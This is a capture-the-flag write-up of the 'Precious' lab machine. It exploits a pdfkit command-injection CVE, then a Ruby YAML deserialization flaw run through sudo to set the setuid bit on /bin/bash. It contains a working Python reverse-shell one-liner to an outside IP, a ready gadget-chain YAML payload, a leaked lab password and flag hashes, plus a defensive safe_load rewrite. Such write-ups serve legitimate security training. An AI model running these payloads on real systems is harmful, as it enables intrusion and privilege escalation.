Target Machine: Precious

admin, 16 February 2023 10:50:40

Information Gathering

Port Scan

nmap -sV --min-rate 1000 -p- 10.10.11.189

PORT   STATE SERVICE    VERSION
22/tcp open  tcpwrapped
80/tcp open  tcpwrapped

Vulnerability Probing

Visiting the web port, we find an SSRF. Starting a web server on our own machine lets us see what kind of request the target sends. We can see that a PDF file is generated.


Downloading the PDF, we can see it was generated with pdfkit v0.8.6. CVE-2022-25765 is one I had not seen before. A Google search shows that it allows command execution.


We construct the payload.


Construct a reverse shell (this python3 reverse shell feels almost unbeatable):

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.33",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'


Privilege Escalation

Preparation for Privilege Escalation

cat /etc/passwd
whoami
sudo -l
uname -a

bash-5.1$ ls ../ -al
total 16
drwxr-xr-x 4 root root 4096 Oct 26 08:28 .
drwxr-xr-x 12 root root 4096 Oct 26 08:28 ..
drwxr-xr-x 2 root root 4096 Oct 26 08:28 html
drwxr-xr-x 6 root root 4096 Oct 26 08:28 pdfapp

bash-5.1$ ls ../../ -al
total 48
drwxr-xr-x 12 root root 4096 Oct 26 08:28 .
drwxr-xr-x 18 root root 4096 Nov 21 15:11 ..
drwxr-xr-x 2 root root 4096 Feb 8 01:24 backups
drwxr-xr-x 9 root root 4096 Oct 26 08:28 cache
drwxr-xr-x 25 root root 4096 Oct 26 08:28 lib
drwxrwsr-x 2 root staff 4096 Oct 26 08:28 local
lrwxrwxrwx 1 root root 9 Sep 26 04:27 lock -> /run/lock
drwxr-xr-x 10 root root 4096 Feb 8 01:06 log
drwxrwsr-x 2 root mail 4096 Oct 26 08:28 mail
drwxr-xr-x 2 root root 4096 Oct 26 08:28 opt
lrwxrwxrwx 1 root root 4 Sep 26 04:27 run -> /run
drwxr-xr-x 4 root root 4096 Oct 26 08:28 spool
drwxrwxrwt 3 root root 4096 Feb 8 03:48 tmp
drwxr-xr-x 4 root root 4096 Oct 26 08:28 www

bash-5.1$ ls / -al
total 68
drwxr-xr-x 18 root root 4096 Nov 21 15:11 .
drwxr-xr-x 18 root root 4096 Nov 21 15:11 ..
lrwxrwxrwx 1 root root 7 Sep 26 04:26 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Nov 21 15:11 boot
drwxr-xr-x 17 root root 3100 Feb 8 01:06 dev
drwxr-xr-x 79 root root 4096 Feb 8 01:06 etc
drwxr-xr-x 4 root root 4096 Oct 26 08:28 home
lrwxrwxrwx 1 root root 31 Nov 21 15:07 initrd.img -> boot/initrd.img-5.10.0-19-amd64
lrwxrwxrwx 1 root root 31 Nov 21 15:11 initrd.img.old -> boot/initrd.img-5.10.0-19-amd64
lrwxrwxrwx 1 root root 7 Sep 26 04:26 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Sep 26 04:26 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Sep 26 04:26 libx32 -> usr/libx32
drwx------ 2 root root 16384 Sep 26 04:26 lost+found
drwxr-xr-x 3 root root 4096 Oct 26 08:28 media
drwxr-xr-x 2 root root 4096 Oct 26 08:28 mnt
drwxr-xr-x 3 root root 4096 Oct 26 08:28 opt
dr-xr-xr-x 276 root root 0 Feb 8 01:06 proc
drwx------ 4 root root 4096 Nov 21 15:32 root
drwxr-xr-x 18 root root 580 Feb 8 05:52 run
lrwxrwxrwx 1 root root 8 Sep 26 04:26 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Oct 26 08:28 srv
dr-xr-xr-x 13 root root 0 Feb 8 01:06 sys
drwxrwxrwt 11 root root 4096 Feb 8 05:38 tmp
drwxr-xr-x 14 root root 4096 Sep 26 04:27 usr
drwxr-xr-x 12 root root 4096 Oct 26 08:28 var
lrwxrwxrwx 1 root root 28 Nov 21 15:07 vmlinuz -> boot/vmlinuz-5.10.0-19-amd64
lrwxrwxrwx 1 root root 28 Nov 21 15:11 vmlinuz.old -> boot/vmlinuz-5.10.0-19-amd64

bash-5.1$ whoami
ruby

bash-5.1$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

bash-5.1$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
henry:x:1000:1000:henry,,,:/home/henry:/bin/bash
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
ruby:x:1001:1001::/home/ruby:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false


henry:Q3c1AqGHtoI0aXAYFH

With this we have a shell as henry; we can log in directly, and then grab the first flag.

bash-5.1$ cd /home/henry
bash-5.1$ ls
dependencies.yml  user.txt
bash-5.1$ cat user.txt
956fc17eb3f5286ede3663a47c52c78d

Privilege Escalation via YAML Deserialization

As the henry user, we continue gathering information and find that the following script can be run as root.

bash-5.1$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

Let's take a look at that file.

bash-5.1$ cat /opt/update*
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

The YAML.load here has a deserialization vulnerability; we just need to learn how to exploit it. The point where the deserialization is triggered is the loading of dependencies.yml. According to the exploit below, git_set is where the command gets executed. vi is hard to use here, so I simply deleted dependencies.yml and downloaded a pre-built one in its place.

- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve

git_set is edited so that, running as root, it sets the setuid bit on /bin/bash. First run the script:

bash-5.1$ sudo /usr/bin/ruby /opt/update_dependencies.rb

Then, as henry, run /bin/bash:

bash-5.1$ /bin/bash -p
bash-5.1# id
uid=1000(henry) gid=1000(henry) euid=0(root) egid=0(root) groups=0(root),1000(henry)
bash-5.1# ls /root
root.txt
bash-5.1# cat /root/root.txt
afb23e8fd8363fa26529425f286c74e1
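As an added example (not code from the write-up or from the box), the loading step of update_dependencies.rb written defensively: because the script reads dependencies.yml by relative path, whoever runs it chooses the file, so the parser must refuse the !ruby/object tags and anchors the payload above is built from and then check the data has the shape the script expects. The sample documents and the helper name load_dependencies are constructed here.

```ruby
require "yaml"

# Constructed sample documents (not from the box). The first is the benign
# shape update_dependencies.rb expects: a list of [name, version] pairs.
BENIGN_YAML = <<~YAML
  - [rake, "13.0.6"]
  - [nokogiri, "1.13.10"]
YAML

# The second names a Ruby class with a !ruby/object tag, the mechanism the
# gadget chain in the write-up is assembled from.
TAGGED_YAML = <<~YAML
  - !ruby/object:Gem::Requirement
    requirements: []
YAML

# The third reuses an anchor (&a / *a), which the chain also relies on.
ALIASED_YAML = <<~YAML
  - &a [rake, "13.0.6"]
  - *a
YAML

# Hardened replacement for YAML.load(File.read("dependencies.yml")):
# only scalars, arrays and hashes may be produced, anchors are refused,
# and the result must be a list of [String, String] pairs.
# Returns [:ok, pairs] or [:rejected, reason]. The helper name is hypothetical.
def load_dependencies(text)
  data = YAML.safe_load(text, permitted_classes: [], aliases: false)
  return [:rejected, "not a list"] unless data.is_a?(Array)
  ok = data.all? { |e| e.is_a?(Array) && e.size == 2 && e.all?(String) }
  ok ? [:ok, data] : [:rejected, "bad entry shape"]
rescue Psych::DisallowedClass, Psych::BadAlias => e
  # Psych raises before any object is built, so no gadget code ever runs.
  [:rejected, e.class.name]
end
```

Note that newer Psych releases (4.x, bundled from Ruby 3.1) already make YAML.load behave like safe_load; the script on this box relied on an older Psych where YAML.load instantiated arbitrary classes.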

Summary and Additional Notes

On this box, the PDF generation feature first led us to a pdfkit CVE.

1. Through that vulnerability we achieved command injection and obtained an initial webshell.
2. From that initial webshell, information gathering turned up another account, henry.
3. After logging in as henry, we found that henry can run a file as root.
4. Analysing that file showed that it loads a dependencies.yml.
5. Analysing dependencies.yml showed that the file is read with YAML.load, which has a deserialization vulnerability.
6. That deserialization vulnerability gives RCE, and through it we gave /bin/bash root privileges (setuid).
7. Finally, invoking /bin/bash gives us root.

Relevant chmod parameters. chmod changes a file's permissions. Common commands:

chmod +x <file>    adds execute permission to the file

chmod 777 <file>   gives the file read, write and execute permission for everyone

chmod +s <file>    when the file is executed, the process's effective user or group ID is set to the file's owner (for example, if I run this command as root, then whoever executes the file afterwards is treated as root)


Originally published on the WeChat public account 靶机狂魔: 靶机-Precious

Reposted at CN-SEC (please keep this link when reposting): http://cn-sec.com/archives/1555126.html
